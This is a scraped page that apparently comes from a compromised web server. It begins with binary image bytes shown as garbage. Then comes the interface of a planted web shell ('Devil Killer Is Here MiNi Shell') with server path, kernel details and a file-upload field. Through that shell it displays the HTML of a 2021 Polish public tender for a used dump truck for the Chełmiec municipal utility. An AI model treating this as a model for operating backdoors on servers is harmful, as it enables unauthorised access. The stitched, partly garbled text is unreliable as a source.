JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030857002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa samochodu ciężarowego dla potrzeb ZGKIM w Chełmcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Komunalnej i Mieszkaniowej Chełmiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00004907522163</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Papieska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-395</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 548 02 19</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18 548 02 43</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@chelmiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chelmiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa samochodu ciężarowego dla potrzeb ZGKIM w Chełmcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66a51175-5912-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00308570</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002911/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Zakup i dostawa samochodu ciężarowego dla potrzeb ZGKIM w Chełmcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/chelmiec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji<br/>elektronicznej, pliki należy opatrzyć: - kwalifikowanym podpisem elektronicznym; podpisem zaufanym, -<br/>lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO: Zgodnie z art.<br/>13ust.1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016roku wsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, informuję,<br/>że:1.administratorem Pani/Pana danych osobowych jest Gmina Chełmiec, ul. Papieska 2, 33-<br/>395Chełmiec2. Pana/Pani dane nie podlegają współ administrowaniu, 3. Zamawiający powołał<br/>inspektoraochrony danych osobowych, który jest dostępny pod adresem – email: iod@chelmiec.pl 4.<br/>Pani/Pana<br/>daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym<br/>zpostępowaniem o udzielenie zamówienia publicznego nr postępowania: ZGKIM.271.18.2021 odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja<br/>postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1ustawy Prawo zamówień publicznych, 6. Pani/Pana dane osobowe<br/>będą przechowywane, zgodnie zart. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia<br/>postępowania o udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czastrwania umowy; 7. obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Panadotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w niniejszym postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodaniaokreślonych danych wynikają z ustawy Pzp, 8. w odniesieniu do Pani/Pana<br/>danych osobowych decyzjenie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO, 9. posiada Pani/Pan:a) na podstawie art. 15RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących, b) napodstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych **, c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>***, d) prawo do wniesienia skargido Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danychosobowych Pani/Pana dotyczących narusza przepisy RODO, 10.<br/>Wykonawca składa do ofertyoświadczenie zawarte w formularzu ofertowym w zakresie wypełnienia<br/>obowiązków informacyjnychprzewidzianych wart. 13 lub art. 14 RODO. 11. W przypadku gdy<br/>Wykonawca nie przekazuje danychosobowych innych niż bezpośrednio jego dotyczących lub zachodzi<br/>wyłączenie stosowania obowiązkuinformacyjnego,stosownie do art. 13 ust.4 lub art. 14 ust. 5 RODO<br/>treści oświadczenia Wykonawca nieskłada(usunięcie treści oświadczenia np. przez jego wykreślenie).<br/>** Wyjaśnienie: skorzystanie zprawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówieniapublicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie możenaruszać integralności protokołu oraz jego załączników.***<br/>Wyjaśnienie: prawo do ograniczeniaprzetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnieniakorzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osoby fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego Unii Europejskiej<br/>lub państwa członkowskiego.Klauzula informacyjna z art. 13 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3lit.b,<br/>d lub e RODO prawo do usunięcia danych osobowych, b) prawo do przenoszenia danychosobowych, o<br/>którym mowa w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danychosobowych jest art.6 ust.<br/>1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGKIM.271.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Przedmiot zamówienia obejmuje: Zakup i dostawę jednej sztuki używanego samochodu ciężarowego dla potrzeb ZGKIM w Chełmcu. <br/>4.	Wymagania ogólne techniczne oraz wyposażenie jakie musi posiadać pojazd będący przedmiotem zamówienia:<br/>•	Rok produkcji min. 2013<br/>•	Przebieg maksymalny 370 000 km<br/>•	Moc silnika minimalna: 410 KM<br/>•	Liczba osi samochodu cztery (napęd 8x4) Rotarder<br/>•	Dopuszczalna masa całkowita całkowita maksymalna: 32 000 kg<br/>•	Kiper trzystronny – MEILLER system Bordmatik<br/>•	Aktualny przegląd techniczny<br/>•	Czytelny numer identyfikacyjny pojazdu (VIN)<br/>•	Skrzynia biegów manualna<br/>•	ABS, ESP (stabilizacja toru jazdy)<br/>•	Klimatyzacja<br/>•	Wspomaganie kierownicy<br/>•	Tachograf, radio<br/>•	Immobilizer<br/>•	Bezwypadkowy, sprawny technicznie<br/>•	Książka serwisowa<br/>•	Tylne koła podwójne<br/>•	Plandeka do zabezpieczenia przewożonych materiałów<br/>•	Pojazd powinien posiadać tabliczkę znamionową i czytelny numer nadwozia<br/>•	Norma emisji spalin „Euro 5”<br/>•	Długość skrzyni ładunkowej max. 5,6 m.<br/>•	Oryginalny, fabryczny lakier<br/>nowe ogumienie - obowiązkowo<br/>5.	Pojazd powinien posiadać tabliczkę znamionową i czytelny numer nadwozia. Zamawiający nie dopuszcza pojazdu, który został przekształcony (np. przerobiony, zmieniony z jazdy w ruchu lewostronnym na jazdę w ruchu prawostronnym).<br/>6.	Oferowany samochód winien spełniać wymagania polskich przepisów w sprawie dopuszczenia do ruchu (w tym warunków technicznych i badań pojazdów). Oferowany pojazd powinien być kompletny, w pełni sprawny technicznie i użytkowo. Wymagania formalne jakie powinien spełniać pojazd podczas czynności odbiorowych:<br/>•	Dla pojazdu zarejestrowanego na terenie Polski: powinien posiadać aktualne badania techniczne potwierdzone wpisem do dowodu rejestracyjnego<br/>•	W przypadku pojazdu sprowadzonego z zagranicy, do odebranego pojazdu będącego przedmiotem zamówienia Wykonawca dołączy następujące dokumenty: dowód rejestracyjny – wymagane tłumaczenie gdy pojazd jest z poza krajów unii europejskiej, książka serwisowa (jeśli jest), kartę pojazdu (jeżeli była wydana), dokument przeniesienia własności, oświadczenie o tablicach rejestracyjnych, informacja kiedy pojazd został sprowadzony na teren Polski<br/>7.	Odbiór pojazdu potwierdzony będzie protokołem zdawczo – odbiorczym, podpisanym przez osobę upoważnioną ze strony Zamawiającego i Wykonawcy. Wykonawca dostarczy samochód do bazy Zamawiającego tj. Chełmiec, ul. Marcinkowicka 24, 33 395 Chełmiec. Parametry techniczne i wyposażenie używanego samochodu mają charakter wymogów minimalnych. Wpisanie parametrów alternatywnych nie jest jednoznaczne z ich przyjęciem przez Zamawiającego. <br/>8.	Sprzęt nie powinien posiadać żadnych widocznych śladów rdzy, korozji, wycieków i luzów na sworzniach przegubach, pompach, siłownikach i silniku powinien być gotowy do pracy. Zamawiający zastrzega sobie prawo do nieodebrania przedmiotu zamówienia w przypadku stwierdzenia jakichkolwiek wad zauważonych podczas odbioru oraz niezgodności z ofertą.<br/>9.	Zamawiający zastrzega możliwość oględzin pojazdu i weryfikacji jego stanu technicznego przed wyborem najkorzystniejszej oferty, w przypadku stwierdzenia niezgodności stanu faktycznego ze stanem podanym w ofercie Zamawiający odrzuci ofertę gdy jej treść jest niezgodna z warunkami zamówienia zgodnie z dyspozycją art. 226 ust. 1 pkt. 5) ustawy PZP. Zamawiający może wymagać udostępnienia pojazdu w celu jego oględzin po mailowym powiadomieniu Wykonawcy o tym fakcie. Pojazd ma zostać udostępniony bez zbędnej zwłoki, ponadto Zamawiający ma prawo dokonać sprawdzenia stanu technicznego pojazdu na dowolnej stacji diagnostycznej, wskazanej przez Zamawiającego na koszt Wykonawcy. Powyższe należy uwzględnić przy wycenie samochodu. W przypadku wykazania niezgodności samochodu z parametrami wymaganymi przez Zamawiającego oferta zostanie odrzucona – ze względu na pisemność postępowania zostanie spisany protokół z przeprowadzenia badania stanu technicznego pojazdu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34142300-7 - Pojazdy samowyładowcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium pierwsze – „Cena”:<br/>W kryterium „Cena” ilość punktów zostanie obliczona dla oferty, według poniższego wzoru:<br/>K1 = ( CN / CB ) x 60<br/>K1 – punkty otrzymane przez ofertę w kryterium „Cena”<br/>CN – najniższa cena spośród wszystkich ważnych ofert (nieodrzuconych)<br/>CB - cena w ofercie badanej<br/>W tym kryterium jako „cena” przyjęta zostanie „wartość brutto zamówienia” podana przez Wykonawcę<br/>w Formularzu ofertowym.<br/>Kryterium drugie – „termin płatności faktury”:<br/>W kryterium „termin płatności faktury” ilość punktów zostanie przyznana według poniższej tabeli:<br/>Termin płatności faktury<br/>Liczba uzyskanych punktów<br/>7 dni - 10 pkt.<br/>14 dni- 20 pkt.<br/>21 dni - 30 pkt.<br/>30 dni - 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">•	w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający wymaga:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 5 do SWZ,<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>•	art. 108 ust. 1 pkt. 1 uPzp<br/>•	art. 108 ust. 1 pkt. 2 uPzp<br/>•	art. 108 ust. 1 pkt 3 uPzp,<br/>•	art. 108 ust. 1 pkt 4 uPzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>•	art. 108 ust. 1 pkt 5 uPzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>•	art. 108 ust. 1 pkt 6 uPzp,<br/>•	art. 109 ust. 1 pkt 1 uPzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170),<br/>•	art. 109 ust. 1 pkt. 4 uPzp<br/>•	art. 109 ust. 1 pkt. 6 uPzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje obowiązku składania przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> zaparafowany wzór umowy , - oświadczenie o aktualnościach składanych<br/>oświadczeń, - w przypadku złożenia oferty przez pełnomocnika pełnomocnictwo musi zawierać<br/>w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty Wykonawców występujących wspólnie: a) Wykonawcyustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówieniaalbo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.W<br/>związku z tym należy wskazane pełnomocnictwo złożyć wraz z ofertą. b) Wodniesieniu do<br/>warunku udziału w postępowaniu dotyczącego zdolności technicznej lubzawodowej wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać nazdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których tezdolności są<br/>wymagane. W tym przypadku, wykonawcy wspólnie ubiegający się o udzieleniezamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlanewykonają<br/>poszczególni wykonawcy. c) Wykonawcy występujący wspólnie powinni złożyćoświadczenia i<br/>dokumenty, o których mowa w niniejszym rozdziale SWZ, z tym, że oświadczeniewstępne<br/>wymienione w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącegozałącznik<br/>nr 2 do SWZ) składa każdy Wykonawca z osobna, natomiast oświadczeniapotwierdzające<br/>spełnianie warunków udziału w postępowaniu określonych przez Zamawiającegomogą być<br/>składane wspólnie. d) Dokument o którym mowa w ust. 1 niniejszego<br/>rozdziałuSWZ(oświadczenie wg wzoru stanowiącego załącznik nr 2 do SWZ) powinien<br/>potwierdzaćspełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z<br/>wykonawcówwykazuje spełnianie warunków udziału w postępowaniu. e) Zamawiający nie<br/>zastrzegaobowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/>ubiegającychsię o udzielenie zamówienia publicznego kluczowych zadań dotyczących<br/>przedmiotowegozamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie wynagrodzenia:<br/>•	w przypadku ustawowej zmiany stawki podatku VAT; jeżeli zmiana stawki VAT będzie powodować zmniejszenie lub zwiększenie kosztów wykonania 